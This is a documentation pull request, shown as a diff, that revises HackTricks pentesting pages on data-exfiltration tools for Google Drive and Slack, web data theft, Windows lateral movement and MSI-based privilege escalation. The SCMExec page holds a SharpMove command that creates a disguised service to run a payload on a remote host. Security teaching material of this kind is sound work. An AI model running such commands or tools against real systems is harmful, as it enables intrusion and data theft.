-- [**GD-Thief**](https://github.com/antman1p/GD-Thief): Red Team tool for exfiltrating files from a target's Google Drive that you(the attacker) has access to, via the Google Drive API. This includes includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.
-- [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Red Team tool for exfiltrating the target organization's Google People Directory that you have access to, via Google's People API.
-- [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token.
-- [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound is a command line tool for red and blue teams to quickly perform reconnaissance of a Slack workspace/organization. Slackhound makes collection of an organization's users, files, messages, etc. quickly searchable and large objects are written to CSV for offline review.
+## External Services
+
+- **Conf-Thief** uses an access token to query Confluence, export accessible pages as PDFs, and download them.<sup>[[3]](#references)</sup>
+- **GD-Thief** uses the Google Drive API to collect files the authenticated identity can access, including shared files and files in shared drives.<sup>[[4]](#references)</sup>
+- **GDir-Thief** uses the Google People API to collect an organization's accessible directory information.<sup>[[5]](#references)</sup>
+- **SlackPirate** uses Slack APIs and an access token to enumerate and extract potentially sensitive workspace information.<sup>[[6]](#references)</sup>
+- **Slackhound** collects Slack workspace objects—including users, files, and messages—and makes the results searchable, writing large objects to CSV for offline analysis.<sup>[[7]](#references)</sup>
+
+## References
+
+- [1] [GitHub - PEASS-ng](https://github.com/peass-ng/PEASS-ng)
+- [2] [GitHub - LaZagne](https://github.com/AlessandroZ/LaZagne)
+- [3] [GitHub - Conf-Thief](https://github.com/antman1p/Conf-Thief)
+- [4] [GitHub - GD-Thief](https://github.com/antman1p/GD-Thief)
+- [5] [GitHub - GDir-Thief](https://github.com/antman1p/GDir-Thief)
+- [6] [GitHub - SlackPirate](https://github.com/emtunc/SlackPirate)
+- [7] [GitHub - Slackhound](https://github.com/BojackThePillager/Slackhound)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/todo/radio-hacking/README.md
+++ b/src/todo/radio-hacking/README.md
@@ -2,3 +2,12 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
+Radio security testing examines how a device transmits, receives, and interprets wireless signals. A software-defined radio (SDR) can help locate a signal, record in-phase/quadrature (I/Q) samples, and test demodulation and decoding without committing to protocol-specific hardware.<sup>[[1]](#references)</sup>
+
+A practical workflow is to identify the frequency band and channel width, capture several known device actions, compare the resulting signals, and then determine the modulation and packet structure. Test replay or transmission only in an isolated environment and on frequencies and equipment for which you have authorization. The pages in this section cover RFID, NFC, sub-GHz radio, infrared, BLE, and related tools.<sup>[[1]](#references)</sup>
+
+## References
+
+- [1] [Great Scott Gadgets - Software Defined Radio with HackRF](https://greatscottgadgets.com/sdr/1/)
+
+{{#include ../../banners/hacktricks-training.md}}

--- a/src/todo/radio-hacking/flipper-zero/README.md
+++ b/src/todo/radio-hacking/flipper-zero/README.md
@@ -2,17 +2,22 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-With [**Flipper Zero**](https://flipperzero.one/) you can:
+Flipper Zero is a portable hardware multitool that supports the following capabilities:<sup>[[1]](#references)</sup>
 
-- **Listen/Capture/Replay radio frequencies:** [**Sub-GHz**](fz-sub-ghz.md)
-- **Read/Capture/Emulate NFC cards:** [**NFC**](fz-nfc.md)
-- **Read/Capture/Emulate 125kHz tags:** [**125kHz RFID**](fz-125khz-rfid.md)
-- **Read/Capture/Send Infrared signals:** [**Infrared**](fz-infrared.md)
-- **Read/Capture/Emulate iButtons:** [**iButton**](../ibutton.md)
-- **Use is as Bad USB**
-- **Use it as security key (U2F)**
-- **Play Snake**
+- **Receive, capture, and replay supported radio signals:** [**Sub-GHz**](fz-sub-ghz.md)
+- **Read, capture, and emulate supported NFC cards:** [**NFC**](fz-nfc.md)
+- **Read, capture, and emulate supported 125 kHz tags:** [**125 kHz RFID**](fz-125khz-rfid.md)
+- **Read, capture, and transmit infrared signals:** [**Infrared**](fz-infrared.md)
+- **Read, capture, and emulate supported iButtons:** [**iButton**](../ibutton.md)
+- **Act as a BadUSB device**
+- **Act as a U2F security key**
+- **Run applications and games such as Snake**
 
-**Other Flipper Zero resources in** [**https://github.com/djsime1/awesome-flipperzer**](https://github.com/djsime1/awesome-flipperzero)
+For community-maintained firmware, applications, databases, and other resources, see the Awesome Flipper Zero collection.<sup>[[2]](#references)</sup>
+
+## References
+
+- [1] [Flipper Zero - Official Product Overview](https://flipper.net/)
+- [2] [GitHub - Awesome Flipper Zero](https://github.com/djsime1/awesome-flipperzero)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
+++ b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
@@ -1,14 +1,13 @@
-# Stealing Sensitive Information Disclosure from a Web
+# Stealing Sensitive Information from a Web Page
 
 {{#include ../banners/hacktricks-training.md}}
 
-If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it.\
-Here I present you the main ways to can try to achieve it:
+If a **web page displays sensitive information based on the current session**—such as cookies, account data, or credit card details—an attacker may try to exfiltrate it. The main techniques include:
 
-- [**CORS bypass**](../pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page.
-- [**XSS**](../pentesting-web/xss-cross-site-scripting/index.html): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information.
-- [**Danging Markup**](../pentesting-web/dangling-markup-html-scriptless-injection/index.html): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
-- [**Clickjaking**](../pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).<sup>[[1]](#references)</sup>
+- [**CORS bypass**](../pentesting-web/cors-bypass.md): A CORS misconfiguration may allow a malicious origin to read sensitive responses through cross-origin requests.
+- [**XSS**](../pentesting-web/xss-cross-site-scripting/index.html): An XSS vulnerability in the target origin may allow injected JavaScript to read and exfiltrate the information.
+- [**Dangling markup**](../pentesting-web/dangling-markup-html-scriptless-injection/index.html): When script injection is unavailable, injected HTML elements may still capture sensitive content.
+- [**Clickjacking**](../pentesting-web/clickjacking.md): If framing protections are absent, an attacker may trick a user into interacting with the sensitive page. The linked case study demonstrates this technique.<sup>[[1]](#references)</sup>
 
 ## References
 

--- a/src/windows-hardening/lateral-movement/README.md
+++ b/src/windows-hardening/lateral-movement/README.md
@@ -2,18 +2,24 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-There are different different ways to execute commands in external systems, here you can find the explanations on how the main Windows lateral movements techniques work:
+Windows supports several mechanisms that can be used to execute commands on remote systems. The following pages explain common lateral-movement techniques and their prerequisites:
 
 - [**PsExec**](psexec-and-winexec.md)
-- [**SmbExec**](smbexec.md)
+- [**SmbExec**](psexec-and-winexec.md#impacket-smbexecpy-smbexec)
 - [**WmiExec**](wmiexec.md)
 - [**AtExec / SchtasksExec**](atexec.md)
 - [**WinRM**](winrm.md)
-- [**DCOM Exec**](dcom-exec.md)
+- [**DCOM Exec**](dcomexec.md)
 - [**RDPexec**](rdpexec.md)
 - [**SCMexec**](scmexec.md)
-- [**Pass the cookie**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html) (cloud)
-- [**Pass the PRT**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html) (cloud)
-- [**Pass the AzureAD Certificate**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html) (cloud)
+- **Pass the cookie** (cloud)<sup>[[1]](#references)</sup>
+- **Pass the PRT** (cloud)<sup>[[2]](#references)</sup>
+- **Pass the Microsoft Entra ID certificate** (cloud)<sup>[[3]](#references)</sup>
+
+## References
+
+- [1] [HackTricks Cloud - Pass the cookie](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html)
+- [2] [HackTricks Cloud - Pass the PRT](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html)
+- [3] [HackTricks Cloud - Pass the certificate](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/windows-hardening/lateral-movement/rdpexec.md
+++ b/src/windows-hardening/lateral-movement/rdpexec.md
@@ -2,15 +2,18 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## How it Works
+## How It Works
 
-**RDPexec** is basically to execute commands login into the system using RDP.
+**RDPexec** refers to executing commands on a remote system after logging in through Remote Desktop Protocol (RDP). RDP provides a remote graphical interface and normally requires an authorized account on the target host.<sup>[[1]](#references)</sup>
 
-For more information check:
-
+For background on RDP enumeration, configuration, and attack techniques, see:
 
 {{#ref}}
 ../../network-services-pentesting/pentesting-rdp.md
 {{#endref}}
+
+## References
+
+- [1] [Microsoft Learn - About Remote Desktop Services](https://learn.microsoft.com/en-us/windows/win32/termserv/about-terminal-services)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/windows-hardening/lateral-movement/scmexec.md
+++ b/src/windows-hardening/lateral-movement/scmexec.md
@@ -1,19 +1,22 @@
-# DCOM Exec
+# SCMExec
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## SCM
+## How It Works
 
-**SCMExec** is a technique to execute commands on remote systems using the Service Control Manager (SCM) to create a service that runs the command. This method can bypass some security controls, such as User Account Control (UAC) and Windows Defender.
+The Service Control Manager Remote Protocol (SCMR) is an RPC-based protocol for configuring and controlling Windows services on a remote computer. With sufficient permissions, an operator can create or reconfigure a service whose binary path contains a command and then start that service to execute the command remotely.<sup>[[1]](#references)</sup>
 
 ## Tools
 
-- [**https://github.com/0xthirteen/SharpMove**](https://github.com/0xthirteen/SharpMove):<sup>[[1]](#references)</sup>
+**SharpMove** supports authenticated remote execution through SCM and several other Windows mechanisms. The following example selects its SCM action, creates a service named `WindowsDebug`, and points it at a payload already present on the remote host.<sup>[[2]](#references)</sup>
 
+```powershell
 SharpMove.exe action=scm computername=remote.host.local command="C:\windows\temp\payload.exe" servicename=WindowsDebug amsi=true
+```
 
 ## References
 
-- [1] [SharpMove - GitHub repository](https://github.com/0xthirteen/SharpMove)
+- [1] [Microsoft Open Specifications - Service Control Manager Remote Protocol overview](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/d5bd5712-fa64-44bf-9433-3651f6a5ce97)
+- [2] [GitHub - SharpMove](https://github.com/0xthirteen/SharpMove)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
@@ -2,21 +2,28 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Download the free version app from [https://www.exemsi.com/documentation/getting-started/](https://www.exemsi.com/download/), execute it and wrap the "malicious" binary on it.\
-Note that you can wrap a "**.bat**" if you **just** want to **execute** **command lines (instead of cmd.exe select the .bat file)**
+MSI Wrapper can package an executable or script as a Windows Installer (`.msi`) file. Download and start the free edition, then select the executable to package. To run a sequence of commands, select a `.bat` file as the input rather than packaging `cmd.exe`.<sup>[[1]](#references)</sup>
 
-![MSI Wrapper: Note that you can wrap a " .bat " if you just want to execute command lines (instead of cmd.exe select the .bat file)](<../../images/image (417).png>)
+![Selecting the source executable or batch script in MSI Wrapper](<../../images/image (417).png>)
 
-And this is the most important part of the configuration:
+Configure the execution context and other installer properties carefully:
 
-![MSI Wrapper: And this is the most important part of the configuration](<../../images/image (312).png>)
+![Configuring the application ID and security context in MSI Wrapper](<../../images/image (312).png>)
 
-![MSI Wrapper: And this is the most important part of the configuration](<../../images/image (346).png>)
+![Configuring installer properties in MSI Wrapper](<../../images/image (346).png>)
 
-![MSI Wrapper: And this is the most important part of the configuration](<../../images/image (1072).png>)
+![Reviewing the MSI Wrapper build settings](<../../images/image (1072).png>)
 
-(Please, note that if you try to pack your own binary you will be able to modify these values)
+These values can be changed when packaging a custom binary.
 
-From here just click on **next buttons** and the last **build button and your installer/wrapper will be generated.**
+Continue through the remaining wizard pages and select **Build** to generate the installer.<sup>[[1]](#references)</sup>
+
+> [!WARNING]
+> Creating an MSI does not by itself grant elevated privileges. Whether installation is elevated depends on Windows Installer policy, package context, and user authorization. Microsoft warns that enabling `AlwaysInstallElevated` for both the user and computer lets non-administrators install packages with system privileges.<sup>[[2]](#references)</sup>
+
+## References
+
+- [1] [MSI Wrapper documentation - Getting started](https://www.exemsi.com/documentation/getting-started/)
+- [2] [Microsoft Learn - Installing a package with elevated privileges for a non-admin](https://learn.microsoft.com/en-us/windows/win32/msi/installing-a-package-with-elevated-privileges-for-a-non-admin)
 
 {{#include ../../banners/hacktricks-training.md}}


### PR DESCRIPTION
## Summary

- standardize each page on one numbered References section and superscript citations
- correct grammar, terminology, and version-specific caveats
- preserve and clarify technical commands, payloads, prerequisites, and workflows
- replace bare or unreliable source links with authoritative references where available

## Validation

- `git diff --check`
- citation/reference numbering audit across all 50 pages
- duplicate heading and substantive-line audit
- external reference URL validation
- `mdbook build`